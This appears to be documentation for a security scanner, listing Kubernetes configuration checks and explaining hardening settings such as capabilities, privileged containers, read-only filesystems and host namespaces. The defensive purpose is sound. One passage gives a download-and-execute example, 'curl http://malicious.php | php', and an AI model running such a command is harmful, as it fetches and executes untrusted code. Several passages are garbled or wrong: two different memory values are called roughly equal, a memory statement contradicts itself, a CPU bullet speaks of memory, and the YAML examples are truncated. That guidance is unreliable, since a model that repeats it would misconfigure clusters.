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Kubernetes Best Practices

Scan use checkov, kubesec and kube-score for analyzing Kubernetes declarative configuration files. The results are not converted into SARIF format yet and hence cannot be used as part of build breaker logic or viewed using the VS Code extension.

Exhaustive checks carried out by scan are detailed below.

Security Audits

Id Type Entity Policy IaC
137 CKV_K8S_32 PodSecurityPolicy PodSecurityPolicy Ensure default seccomp profile set to docker/default or runtime/default Kubernetes
138 CKV_K8S_6 PodSecurityPolicy PodSecurityPolicy Do not admit root containers Kubernetes
139 CKV_K8S_5 PodSecurityPolicy PodSecurityPolicy Containers should not run with allowPrivilegeEscalation Kubernetes
140 CKV_K8S_1 PodSecurityPolicy PodSecurityPolicy Do not admit containers wishing to share the host process ID namespace Kubernetes
141 CKV_K8S_24 PodSecurityPolicy PodSecurityPolicy Do not allow containers with added capability Kubernetes
142 CKV_K8S_2 PodSecurityPolicy PodSecurityPolicy Do not admit privileged containers Kubernetes
143 CKV_K8S_4 PodSecurityPolicy PodSecurityPolicy Do not admit containers wishing to share the host network namespace Kubernetes
144 CKV_K8S_3 PodSecurityPolicy PodSecurityPolicy Do not admit containers wishing to share the host IPC namespace Kubernetes
145 CKV_K8S_36 PodSecurityPolicy PodSecurityPolicy Minimize the admission of containers with capabilities assigned Kubernetes
146 CKV_K8S_7 PodSecurityPolicy PodSecurityPolicy Do not admit containers with the NET_RAW capability Kubernetes
147 CKV_K8S_8 PodSecurityPolicy containers Liveness Probe Should be Configured Kubernetes
148 CKV_K8S_26 PodSecurityPolicy containers Do not specify hostPort unless absolutely necessary Kubernetes
149 CKV_K8S_14 PodSecurityPolicy containers Image Tag should be fixed - not latest or blank Kubernetes
150 CKV_K8S_37 PodSecurityPolicy containers Minimize the admission of containers with capabilities assigned Kubernetes
151 CKV_K8S_30 PodSecurityPolicy containers Apply security context to your pods and containers Kubernetes
152 CKV_K8S_25 PodSecurityPolicy containers Minimize the admission of containers with added capability Kubernetes
153 CKV_K8S_43 PodSecurityPolicy containers Image should use digest Kubernetes
154 CKV_K8S_15 PodSecurityPolicy containers Image Pull Policy should be Always Kubernetes
155 CKV_K8S_34 PodSecurityPolicy containers Ensure that Tiller (Helm v2) is not deployed Kubernetes
156 CKV_K8S_16 PodSecurityPolicy containers Container should not be privileged Kubernetes
157 CKV_K8S_20 PodSecurityPolicy containers Containers should not run with allowPrivilegeEscalation Kubernetes
158 CKV_K8S_10 PodSecurityPolicy containers CPU requests should be set Kubernetes
159 CKV_K8S_9 PodSecurityPolicy containers Readiness Probe Should be Configured Kubernetes
160 CKV_K8S_35 PodSecurityPolicy containers Prefer using secrets as files over secrets as environment variables Kubernetes
161 CKV_K8S_28 PodSecurityPolicy containers Minimize the admission of containers with the NET_RAW capability Kubernetes
162 CKV_K8S_33 PodSecurityPolicy containers Ensure the Kubernetes dashboard is not deployed Kubernetes
163 CKV_K8S_11 PodSecurityPolicy containers CPU limits should be set Kubernetes
164 CKV_K8S_12 PodSecurityPolicy containers Memory requests should be set Kubernetes
165 CKV_K8S_39 PodSecurityPolicy containers Do not use the CAP_SYS_ADMIN linux capability Kubernetes
166 CKV_K8S_22 PodSecurityPolicy containers Use read-only filesystem for containers where possible Kubernetes
167 CKV_K8S_13 PodSecurityPolicy containers Memory limits should be set Kubernetes
168 CKV_K8S_26 PodSecurityPolicy initContainers Do not specify hostPort unless absolutely necessary Kubernetes
169 CKV_K8S_14 PodSecurityPolicy initContainers Image Tag should be fixed - not latest or blank Kubernetes
170 CKV_K8S_37 PodSecurityPolicy initContainers Minimize the admission of containers with capabilities assigned Kubernetes
171 CKV_K8S_30 PodSecurityPolicy initContainers Apply security context to your pods and containers Kubernetes
172 CKV_K8S_25 PodSecurityPolicy initContainers Minimize the admission of containers with added capability Kubernetes
173 CKV_K8S_43 PodSecurityPolicy initContainers Image should use digest Kubernetes
174 CKV_K8S_15 PodSecurityPolicy initContainers Image Pull Policy should be Always Kubernetes
175 CKV_K8S_34 PodSecurityPolicy initContainers Ensure that Tiller (Helm v2) is not deployed Kubernetes
176 CKV_K8S_16 PodSecurityPolicy initContainers Container should not be privileged Kubernetes
177 CKV_K8S_20 PodSecurityPolicy initContainers Containers should not run with allowPrivilegeEscalation Kubernetes
178 CKV_K8S_10 PodSecurityPolicy initContainers CPU requests should be set Kubernetes
179 CKV_K8S_35 PodSecurityPolicy initContainers Prefer using secrets as files over secrets as environment variables Kubernetes
180 CKV_K8S_28 PodSecurityPolicy initContainers Minimize the admission of containers with the NET_RAW capability Kubernetes
181 CKV_K8S_33 PodSecurityPolicy initContainers Ensure the Kubernetes dashboard is not deployed Kubernetes
182 CKV_K8S_11 PodSecurityPolicy initContainers CPU limits should be set Kubernetes
183 CKV_K8S_12 PodSecurityPolicy initContainers Memory requests should be set Kubernetes
184 CKV_K8S_39 PodSecurityPolicy initContainers Do not use the CAP_SYS_ADMIN linux capability Kubernetes
185 CKV_K8S_22 PodSecurityPolicy initContainers Use read-only filesystem for containers where possible Kubernetes
186 CKV_K8S_13 PodSecurityPolicy initContainers Memory limits should be set Kubernetes
187 CKV_K8S_41 PodSecurityPolicy ServiceAccount Ensure that default service accounts are not actively used Kubernetes
188 CKV_K8S_21 PodSecurityPolicy ServiceAccount The default namespace should not be used Kubernetes
189 CKV_K8S_42 PodSecurityPolicy RoleBinding Ensure that default service accounts are not actively used Kubernetes
190 CKV_K8S_21 PodSecurityPolicy RoleBinding The default namespace should not be used Kubernetes
191 CKV_K8S_42 PodSecurityPolicy ClusterRoleBinding Ensure that default service accounts are not actively used Kubernetes
192 CKV_K8S_31 PodSecurityPolicy Pod Ensure that the seccomp profile is set to docker/default or runtime/default Kubernetes
193 CKV_K8S_21 PodSecurityPolicy Pod The default namespace should not be used Kubernetes
194 CKV_K8S_40 PodSecurityPolicy Pod Containers should run as a high UID to avoid host conflict Kubernetes
195 CKV_K8S_38 PodSecurityPolicy Pod Ensure that Service Account Tokens are only mounted where necessary Kubernetes
196 CKV_K8S_17 PodSecurityPolicy Pod Containers should not share the host process ID namespace Kubernetes
197 CKV_K8S_27 PodSecurityPolicy Pod Do not expose the docker daemon socket to containers Kubernetes
198 CKV_K8S_18 PodSecurityPolicy Pod Containers should not share the host IPC namespace Kubernetes
199 CKV_K8S_29 PodSecurityPolicy Pod Apply security context to your pods and containers Kubernetes
200 CKV_K8S_19 PodSecurityPolicy Pod Containers should not share the host network namespace Kubernetes
201 CKV_K8S_23 PodSecurityPolicy Pod Minimize the admission of root containers Kubernetes
202 CKV_K8S_31 PodSecurityPolicy Deployment Ensure that the seccomp profile is set to docker/default or runtime/default Kubernetes
203 CKV_K8S_21 PodSecurityPolicy Deployment The default namespace should not be used Kubernetes
204 CKV_K8S_40 PodSecurityPolicy Deployment Containers should run as a high UID to avoid host conflict Kubernetes
205 CKV_K8S_38 PodSecurityPolicy Deployment Ensure that Service Account Tokens are only mounted where necessary Kubernetes
206 CKV_K8S_17 PodSecurityPolicy Deployment Containers should not share the host process ID namespace Kubernetes
207 CKV_K8S_27 PodSecurityPolicy Deployment Do not expose the docker daemon socket to containers Kubernetes
208 CKV_K8S_18 PodSecurityPolicy Deployment Containers should not share the host IPC namespace Kubernetes
209 CKV_K8S_29 PodSecurityPolicy Deployment Apply security context to your pods and containers Kubernetes
210 CKV_K8S_19 PodSecurityPolicy Deployment Containers should not share the host network namespace Kubernetes
211 CKV_K8S_23 PodSecurityPolicy Deployment Minimize the admission of root containers Kubernetes
212 CKV_K8S_31 PodSecurityPolicy DaemonSet Ensure that the seccomp profile is set to docker/default or runtime/default Kubernetes
213 CKV_K8S_21 PodSecurityPolicy DaemonSet The default namespace should not be used Kubernetes
214 CKV_K8S_40 PodSecurityPolicy DaemonSet Containers should run as a high UID to avoid host conflict Kubernetes
215 CKV_K8S_38 PodSecurityPolicy DaemonSet Ensure that Service Account Tokens are only mounted where necessary Kubernetes
216 CKV_K8S_17 PodSecurityPolicy DaemonSet Containers should not share the host process ID namespace Kubernetes
217 CKV_K8S_27 PodSecurityPolicy DaemonSet Do not expose the docker daemon socket to containers Kubernetes
218 CKV_K8S_18 PodSecurityPolicy DaemonSet Containers should not share the host IPC namespace Kubernetes
219 CKV_K8S_29 PodSecurityPolicy DaemonSet Apply security context to your pods and containers Kubernetes
220 CKV_K8S_19 PodSecurityPolicy DaemonSet Containers should not share the host network namespace Kubernetes
221 CKV_K8S_23 PodSecurityPolicy DaemonSet Minimize the admission of root containers Kubernetes
222 CKV_K8S_31 PodSecurityPolicy StatefulSet Ensure that the seccomp profile is set to docker/default or runtime/default Kubernetes
223 CKV_K8S_21 PodSecurityPolicy StatefulSet The default namespace should not be used Kubernetes
224 CKV_K8S_40 PodSecurityPolicy StatefulSet Containers should run as a high UID to avoid host conflict Kubernetes
225 CKV_K8S_38 PodSecurityPolicy StatefulSet Ensure that Service Account Tokens are only mounted where necessary Kubernetes
226 CKV_K8S_17 PodSecurityPolicy StatefulSet Containers should not share the host process ID namespace Kubernetes
227 CKV_K8S_27 PodSecurityPolicy StatefulSet Do not expose the docker daemon socket to containers Kubernetes
228 CKV_K8S_18 PodSecurityPolicy StatefulSet Containers should not share the host IPC namespace Kubernetes
229 CKV_K8S_29 PodSecurityPolicy StatefulSet Apply security context to your pods and containers Kubernetes
230 CKV_K8S_19 PodSecurityPolicy StatefulSet Containers should not share the host network namespace Kubernetes
231 CKV_K8S_23 PodSecurityPolicy StatefulSet Minimize the admission of root containers Kubernetes
232 CKV_K8S_31 PodSecurityPolicy ReplicaSet Ensure that the seccomp profile is set to docker/default or runtime/default Kubernetes
233 CKV_K8S_21 PodSecurityPolicy ReplicaSet The default namespace should not be used Kubernetes
234 CKV_K8S_40 PodSecurityPolicy ReplicaSet Containers should run as a high UID to avoid host conflict Kubernetes
235 CKV_K8S_38 PodSecurityPolicy ReplicaSet Ensure that Service Account Tokens are only mounted where necessary Kubernetes
236 CKV_K8S_17 PodSecurityPolicy ReplicaSet Containers should not share the host process ID namespace Kubernetes
237 CKV_K8S_27 PodSecurityPolicy ReplicaSet Do not expose the docker daemon socket to containers Kubernetes
238 CKV_K8S_18 PodSecurityPolicy ReplicaSet Containers should not share the host IPC namespace Kubernetes
239 CKV_K8S_29 PodSecurityPolicy ReplicaSet Apply security context to your pods and containers Kubernetes
240 CKV_K8S_19 PodSecurityPolicy ReplicaSet Containers should not share the host network namespace Kubernetes
241 CKV_K8S_23 PodSecurityPolicy ReplicaSet Minimize the admission of root containers Kubernetes
242 CKV_K8S_31 PodSecurityPolicy ReplicationController Ensure that the seccomp profile is set to docker/default or runtime/default Kubernetes
243 CKV_K8S_21 PodSecurityPolicy ReplicationController The default namespace should not be used Kubernetes
244 CKV_K8S_40 PodSecurityPolicy ReplicationController Containers should run as a high UID to avoid host conflict Kubernetes
245 CKV_K8S_38 PodSecurityPolicy ReplicationController Ensure that Service Account Tokens are only mounted where necessary Kubernetes
246 CKV_K8S_17 PodSecurityPolicy ReplicationController Containers should not share the host process ID namespace Kubernetes
247 CKV_K8S_27 PodSecurityPolicy ReplicationController Do not expose the docker daemon socket to containers Kubernetes
248 CKV_K8S_18 PodSecurityPolicy ReplicationController Containers should not share the host IPC namespace Kubernetes
249 CKV_K8S_29 PodSecurityPolicy ReplicationController Apply security context to your pods and containers Kubernetes
250 CKV_K8S_19 PodSecurityPolicy ReplicationController Containers should not share the host network namespace Kubernetes
251 CKV_K8S_23 PodSecurityPolicy ReplicationController Minimize the admission of root containers Kubernetes
252 CKV_K8S_31 PodSecurityPolicy Job Ensure that the seccomp profile is set to docker/default or runtime/default Kubernetes
253 CKV_K8S_21 PodSecurityPolicy Job The default namespace should not be used Kubernetes
254 CKV_K8S_40 PodSecurityPolicy Job Containers should run as a high UID to avoid host conflict Kubernetes
255 CKV_K8S_38 PodSecurityPolicy Job Ensure that Service Account Tokens are only mounted where necessary Kubernetes
256 CKV_K8S_17 PodSecurityPolicy Job Containers should not share the host process ID namespace Kubernetes
257 CKV_K8S_27 PodSecurityPolicy Job Do not expose the docker daemon socket to containers Kubernetes
258 CKV_K8S_18 PodSecurityPolicy Job Containers should not share the host IPC namespace Kubernetes
259 CKV_K8S_29 PodSecurityPolicy Job Apply security context to your pods and containers Kubernetes
260 CKV_K8S_19 PodSecurityPolicy Job Containers should not share the host network namespace Kubernetes
261 CKV_K8S_23 PodSecurityPolicy Job Minimize the admission of root containers Kubernetes
262 CKV_K8S_31 PodSecurityPolicy CronJob Ensure that the seccomp profile is set to docker/default or runtime/default Kubernetes
263 CKV_K8S_21 PodSecurityPolicy CronJob The default namespace should not be used Kubernetes
264 CKV_K8S_40 PodSecurityPolicy CronJob Containers should run as a high UID to avoid host conflict Kubernetes
265 CKV_K8S_38 PodSecurityPolicy CronJob Ensure that Service Account Tokens are only mounted where necessary Kubernetes
266 CKV_K8S_17 PodSecurityPolicy CronJob Containers should not share the host process ID namespace Kubernetes
267 CKV_K8S_27 PodSecurityPolicy CronJob Do not expose the docker daemon socket to containers Kubernetes
268 CKV_K8S_18 PodSecurityPolicy CronJob Containers should not share the host IPC namespace Kubernetes
269 CKV_K8S_29 PodSecurityPolicy CronJob Apply security context to your pods and containers Kubernetes
270 CKV_K8S_19 PodSecurityPolicy CronJob Containers should not share the host network namespace Kubernetes
271 CKV_K8S_23 PodSecurityPolicy CronJob Minimize the admission of root containers Kubernetes
272 CKV_K8S_21 PodSecurityPolicy Service The default namespace should not be used Kubernetes
273 CKV_K8S_21 PodSecurityPolicy Secret The default namespace should not be used Kubernetes
274 CKV_K8S_21 PodSecurityPolicy Role The default namespace should not be used Kubernetes
275 CKV_K8S_21 PodSecurityPolicy ConfigMap The default namespace should not be used Kubernetes
276 CKV_K8S_21 PodSecurityPolicy Ingress The default namespace should not be used Kubernetes


Also containers[].resources.requests.cpu

When Containers have resource requests specified the scheduler can make better decisions about which nodes to place Pods on and how to deal with resource contention.

Limits and requests for CPU resources are measured in cpu units. Kubernetes judges these as:

  • 1 AWS vCPU
  • 1 GCP Core
  • 1 Azure vCore
  • 1 Hyperthread on a bare-metal Intel processor with Hyperthreading


  • Fractional requests are allowed.
  • CPU is always requested as an absolute quantity, never as a relative quantity; 0.1 is the same amount of CPU on a single-core, dual-core, or 48-core machine.
  • Each node has a maximum capacity for each of the resource types: the amount of CPU and memory it can provide for Pods
  • Although actual memory or CPU resource usage on nodes is very low, the scheduler still refuses to place a Pod on a node if the capacity check fails
  • If a CPU limit is not applied, the namespace’s limit is automatically assigned via a LimitRange. If this does not exist there is no upper bound to the memory a container can use


Also containers[].resources.requests.memory

When Containers have resource requests specified the scheduler can make better decisions about which nodes to place Pods on and how to deal with resource contention.

Limits and requests for memory are measured in bytes. You can express memory as a plain integer or as a fixed-point integer using one of these suffixes: E, P, T, G, M, K. You can also use the power-of-two equivalents: Ei, Pi, Ti, Gi, Mi, Ki. For example, the following represent roughly the same value:


    memory: 200Mi
    memory: 100Mi


  • A Container can exceed its memory request if the Node has memory available, although this is not allowed
  • If a Container allocates more memory than its limit, the Container becomes a candidate for termination. It will be terminated if it continues to consume memory beyond its limit
  • The memory request for the Pod is the sum of the memory requests for all the Containers in the Pod
  • If a memory limit is not applied, the namespace’s limit is automatically assigned via a LimitRange. If this does not exist there is no upper bound to the memory a container can use

containers[].securityContext.capabilities.add | index("SYS_ADMIN")

Also containers[].securityContext.capabilities.drop | index("ALL")

CAP_SYS_ADMIN is the most privileged capability and should always be avoided

Capabilities permit certain named root actions without giving full root access. They are a more fine-grained permissions model, and all capabilities should be dropped from a pod, with only those required added back.

There are a large number of capabilities, with CAP_SYS_ADMIN bounding most. Never enable this capability - it’s equivalent to root.

apiVersion: extensions/v1beta1
kind: Deployment
  - name: payment
    image: nginx
          - all
          - NET_BIND_SERVICE


  • Drop all capabilities from a pod as above
  • Add only those required
  • Run a comprehensive test suite to ensure security extensions have not blocked functionality that your containers or pods require

containers[].securityContext.privileged == true

Privileged containers can allow almost completely unrestricted host access

Privileged containers share namespaces with the host system, eschew cgroup restrictions, and do not offer any security. They should be used exclusively as a bundling and distribution mechanism for the code in the container, and not for isolation.


  • Processes within the container get almost the same privileges that are available to processes outside a container
  • Privileged containers have significantly fewer kernel isolation features
  • root inside a privileged container is close to root on the host as User Namespaces are not enforced
  • Privileged containers shared /dev with the host, which allows mounting of the host’s filesystem
  • They can also interact with the kernel to load kernel and alter settings (including the hostname), interfere with the network stack, and many other subtle permissions

containers[].securityContext.readOnlyRootFilesystem == true

An immutable root filesystem can prevent malicious binaries being added to PATH and increase attack cost

An immutable root filesystem prevents applications from writing to their local disk. This is desirable in the event of an intrusion as the attacker will not be able to tamper with the filesystem or write foreign executables to disk.

However if there are runtimes available in the container then this is not sufficient to prevent code execution. Consider curl http://malicious.php | php or bash -c "echo 'much pasted code'".


  • Immutable filesystems will prevent your application writing to disk. There may be a requirement for temporary files or local caching, in which case an emptyDir volume can be mounted with type Memory
  • Any volume mounted into the container will have its own filesystem permissions
  • Scratch containers are an ideal candidate for immutableRootFilesystem - they contain only your code, minimal dev, etc, proc, and sys, and so need a runtime (or injection into the scratch binary) to execute code. Without a writable filesystem the attack surface is dramatically reduced.

containers[].securityContext.runAsNonRoot == true

Also containers[].securityContext.runAsUser > 10000

  • Force the running image to run as a non-root user to ensure least privilege
  • Indicates that containers should run as non-root user.


  • Container level security context settings are applied to the specific container and override settings made at the pod level where there is overlap
  • Container level settings are not applied to the pod’s volumes.

To configure run as user:

  • MustRunAs - Requires a range to be configured. Uses the first value of the range as the default. Validates against the configured range.
  • MustRunAsNonRoot - Requires that the pod be submitted with a non-zero runAsUser or have the USER directive defined in the image. No default provided.
  • RunAsAny - No default provided. Allows any runAsUser to be specified.

securityContext capabilities

Reducing kernel capabilities available to a container limits its attack surface

Capabilities permit certain named root actions without giving full root access. They are a more fine-grained permissions model, and all capabilities should be dropped from a pod, with only those required added back.

There are a large number of capabilities, with CAP_SYS_ADMIN bounding most. Never enable this capability - it’s equivalent to root.

apiVersion: extensions/v1beta1
kind: Deployment
  - name: payment
    image: nginx
          - all
          - NET_BIND_SERVICE


  • Drop all capabilities from a pod as above
  • Add only those required
  • Run a comprehensive test suite to ensure security extensions have not blocked functionality that your containers or pods require

Service Accounts

Service accounts restrict Kubernetes API access and should be configured with least privilege

ServiceAccounts provide bot users for cluster access. These accounts can be configured with least privilege, reducing the risk of a vulnerability in the code that account runs being able to pivot into other services.


Well defined AppArmor policies may provide greater protection from unknown threats. WARNING: NOT PRODUCTION READY

This feature is a proof-of-concept and should not be used in production.


Also .metadata.annotations.""

Seccomp profiles for OpenShift set minimum privilege and secure against unknown threats

Seccomp is a system call filtering facility in the Linux kernel which lets applications define limits on system calls they may make, and what should happen when system calls are made. Seccomp is used to reduce the attack surface available to applications. source

Specify a Seccomp profile for all containers of the Pod:

Specify a Seccomp profile for an individual container:${container_name}


Managing /etc/hosts aliases can prevent Docker from modifying the file after a pod’s containers have already been started


Sharing the host’s IPC namespace allows container processes to communicate with processes on the host

Removing namespaces from pods reduces isolation and allows the processes in the pod to perform tasks as if they were running natively on the host.

This circumvents the protection models that containers are based on and should only be done with absolutely certainty (for example, for low-level observation of other containers).


Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter

Removing namespaces from pods reduces isolation and allows the processes in the pod to perform tasks as if they were running natively on the host.

This circumvents the protection models that containers are based on and should only be done with absolutely certainty (for example, for low-level observation of other containers).


Sharing the host’s PID namespace allows visibility of processes on the host, potentially leaking information such as environment variables and configuration

Removing namespaces from pods reduces isolation and allows the processes in the pod to perform tasks as if they were running natively on the host.

This circumvents the protection models that containers are based on and should only be done with absolutely certainty (for example, for low-level observation of other containers).

.spec.volumeClaimTemplates[].spec.accessModes | index("ReadWriteOnce")

ReadWriteMany mode should be avoided


.spec.volumes[].hostPath.path == "/var/run/docker.sock"

Mounting the docker.socket leaks information about other containers and can allow container breakout


Makes sure that the Ingress targets a Service


Makes sure that all CronJobs has a configured deadline


Makes sure that all pods have resource limits and requests set. The --ignore-container-cpu-limit flag can be used to disable the requirement of having a CPU limit


Additional related checks performed

| Check | Comment|
| container-resource-requests-equal-limits | Makes sure that all pods have the same requests as limits on resources set. |
| container-cpu-requests-equal-limits | Makes sure that all pods have the same CPU requests as limits set. |
| container-memory-requests-equal-limits | Makes sure that all pods have the same memory requests as limits set. |
| container-image-tag | Makes sure that a explicit non-latest tag is used |
| container-image-pull-policy | Makes sure that the pullPolicy is set to Always. This makes sure that imagePullSecrets are always validated. |


Makes sure that all StatefulSets are targeted by a PDB


Makes sure that all Deployments are targeted by a PDB


Makes sure that all Pods are targeted by a NetworkPolicy


Makes sure that all NetworkPolicies targets at least one Pod


Makes sure that all Pods have safe probe configurations


Makes sure that all pods have good securityContexts configured


Makes sure that all pods have at a seccomp policy configured.


Makes sure that all Services targets a Pod


Makes sure that the Service type is not NodePort


Checks if the object is using a deprecated apiVersion


Makes sure that a podAntiAffinity has been set that prevents multiple pods from being scheduled on the same node. Docs


Makes sure that a podAntiAffinity has been set that prevents multiple pods from being scheduled on the same node. Docs


Validates label values


Makes sure that the HPA targets a valid object

Last update: January 25, 2023